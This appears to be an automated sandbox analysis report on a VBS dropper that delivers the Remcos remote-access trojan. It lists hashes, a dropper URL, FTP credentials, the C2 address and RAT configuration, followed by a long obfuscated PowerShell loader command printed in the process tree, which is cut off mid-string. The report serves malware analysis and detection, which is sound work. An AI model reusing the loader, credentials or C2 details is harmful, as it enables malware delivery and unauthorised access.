Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2024 07:16

General

  • Target

    SKMBT_77122012816310TD0128_17311_XLS.vbs

  • Size

    591KB

  • MD5

    9b36a3c24abb6bc8694e48e0c101c416

  • SHA1

    6fd1c1c65d63f349734f2efcce64c88b3efd5e45

  • SHA256

    7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15

  • SHA512

    e22e5725ff50239c8df0ea9010ea389bdd79392dbcf01d65c9af5a32fd0084f501db879fcee5dfee0a2d02c9626d7d8f61abb240189d9fcf6ae00b1602298f64

  • SSDEEP

    1536:rcccccccccccccccccq99999999999999999999999999999999999999999999n:J

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Extracted

Family

remcos

Botnet

NedDay

C2

212.162.149.163:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    1210

  • mouse_option

    false

  • mutex

    Rmc-52K54M

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SKMBT_77122012816310TD0128_17311_XLS.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + 